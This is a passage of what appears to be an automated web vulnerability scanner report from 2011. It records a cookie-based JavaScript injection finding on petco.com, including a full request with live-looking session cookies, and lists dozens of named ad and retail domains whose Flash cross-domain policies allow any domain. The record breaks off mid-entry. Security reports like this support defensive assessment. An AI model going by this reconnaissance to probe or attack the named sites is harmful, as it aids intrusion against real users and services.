Severity:	Information
Confidence:	Firm
Host:	http://www.petco.com
Path:	/

Issue detail

The value of the ResonanceSegment cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 61c9e(a)c8b8ba6952f was submitted in the ResonanceSegment cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=261c9e(a)c8b8ba6952f; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

6. Flash cross-domain policy previous next
There are 87 instances of this issue:

http://9d060c.r.axf8.net/crossdomain.xml
http://a.netmng.com/crossdomain.xml
http://a.rfihub.com/crossdomain.xml
http://a.tribalfusion.com/crossdomain.xml
http://action.mathtag.com/crossdomain.xml
http://action.media6degrees.com/crossdomain.xml
http://ad.afy11.net/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://ads.traderonline.com/crossdomain.xml
http://ads.undertone.com/crossdomain.xml
http://adserver.veruta.com/crossdomain.xml
http://altfarm.mediaplex.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://beacon.afy11.net/crossdomain.xml
http://bp.specificclick.net/crossdomain.xml
http://bs.serving-sys.com/crossdomain.xml
http://cebwa.122.2o7.net/crossdomain.xml
http://cimg-1.restorationhardware.com/crossdomain.xml
http://customerappreciation.petco.com/crossdomain.xml
http://d.xp1.ru4.com/crossdomain.xml
http://data.coremetrics.com/crossdomain.xml
http://dis.us.criteo.com/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://gsicace.112.2o7.net/crossdomain.xml
http://hire.jobvite.com/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://idcs.interclick.com/crossdomain.xml
http://marketlive.122.2o7.net/crossdomain.xml
http://mbox12.offermatica.com/crossdomain.xml
http://media.fastclick.net/crossdomain.xml
http://media.gnc.com/crossdomain.xml
http://media.gsimedia.net/crossdomain.xml
http://media2.legacy.com/crossdomain.xml
http://metrics.brookstone.com/crossdomain.xml
http://metrics.ftd.com/crossdomain.xml
http://metrics.gnc.com/crossdomain.xml
http://metrics.mcafee.com/crossdomain.xml
http://metrics.pacsun.com/crossdomain.xml
http://metrics.petsmart.com/crossdomain.xml
http://mlarmani.122.2o7.net/crossdomain.xml
http://o.toshibadirect.com/crossdomain.xml
http://pix04.revsci.net/crossdomain.xml
http://r.turn.com/crossdomain.xml
http://rpt.footlocker.com/crossdomain.xml
http://s.xp1.ru4.com/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://segment-pixel.invitemedia.com/crossdomain.xml
http://server.bhphotovideo.com/crossdomain.xml
http://sv.liveclicker.net/crossdomain.xml
http://tags.mediaforge.com/crossdomain.xml
http://uat.netmng.com/crossdomain.xml
http://wasc.homedepot.ca/crossdomain.xml
http://www.mapquestapi.com/crossdomain.xml
http://www26.orientaltrading.com/crossdomain.xml
http://ace.imageg.net/crossdomain.xml
http://ads.adbrite.com/crossdomain.xml
http://ads.al.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://gnc.imageg.net/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://images.scanalert.com/crossdomain.xml
http://images3.pacsun.com/crossdomain.xml
http://login.dotomi.com/crossdomain.xml
http://media.restorationhardware.com/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
https://ordering.ftd.com/crossdomain.xml
http://pet.imageg.net/crossdomain.xml
http://rya.rockyou.com/crossdomain.xml
http://s7.orientaltrading.com/crossdomain.xml
https://secure.homedepot.ca/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://subscriptions.marvel.com/crossdomain.xml
https://subscriptions.marvel.com/crossdomain.xml
http://www.acehardware.com/crossdomain.xml
https://www.acehardware.com/crossdomain.xml
http://www.armaniexchange.com/crossdomain.xml
https://www.armaniexchange.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.ftd.com/crossdomain.xml
http://www.gnc.com/crossdomain.xml
https://www.gnc.com/crossdomain.xml
http://www.homedepot.ca/crossdomain.xml
http://www.petsmart.com/crossdomain.xml
https://www.petsmart.com/crossdomain.xml
http://www.res-x.com/crossdomain.xml
http://www.helzberg.com/crossdomain.xml
https://www.helzberg.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://9d060c.r.axf8.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://9d060c.r.axf8.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 9d060c.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:22 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.2. http://a.netmng.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:04 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.3. http://a.rfihub.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 199

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.4. http://a.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.5. http://action.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://action.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Set-Cookie: uuid=b8c3cf57-3d33-43ae-957f-69f246813443; path=/; expires=Thu, 15-May-2014 01:55:06 GMT; domain=.mathtag.com
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Mon, 16 May 2011 01:55:06 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.6. http://action.media6degrees.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 16 May 2011 01:55:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.7. http://ad.afy11.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:33 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.8. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.9. http://ads.traderonline.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.traderonline.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.traderonline.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:11:18 GMT
ETag: "c6acd-d0-46e5f933c6580"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.10. http://ads.undertone.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "4cd8005-fc-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 252
Content-Type: text/xml
Date: Mon, 16 May 2011 02:00:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.11. http://adserver.veruta.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.veruta.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.veruta.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 16 May 2011 01:58:38 GMT
Content-Type: text/xml
Content-Length: 211
Last-Modified: Sat, 24 Oct 2009 00:35:22 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-doma
...[SNIP]...

6.12. http://altfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Mon, 16 May 2011 02:00:28 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.13. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.14. http://beacon.afy11.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://beacon.afy11.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:36:36 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.15. http://bp.specificclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 16 May 2011 01:54:10 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.16. http://bs.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:57:38 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.17. http://cebwa.122.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cebwa.122.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.18. http://cimg-1.restorationhardware.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cimg-1.restorationhardware.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cimg-1.restorationhardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:22 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "24406b-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=985
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://customerappreciation.petco.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://customerappreciation.petco.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: customerappreciation.petco.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:24 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "a6de0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=900
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://d.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:58:24 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.21. http://data.coremetrics.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://data.coremetrics.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "21c4c0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=851
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. http://dis.us.criteo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dis.us.criteo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Mon, 16 May 2011 01:58:00 GMT
Expires: Thu, 10 May 2012 01:58:00 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.23. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 02:39:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 83614
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://gsicace.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gsicace.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:11 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.25. http://hire.jobvite.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: hire.jobvite.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 18:27:10 GMT
Accept-Ranges: bytes
ETag: "093692a3928cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:20 GMT
Connection: close
Content-Length: 108

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.26. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 02:01:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.27. http://idcs.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 16 May 2011 02:01:01 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.28. http://marketlive.122.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://marketlive.122.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.29. http://mbox12.offermatica.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox12.offermatica.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox12.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 16 May 2011 01:53:41 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.30. http://media.fastclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:30 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19993
Connection: Keep-Alive
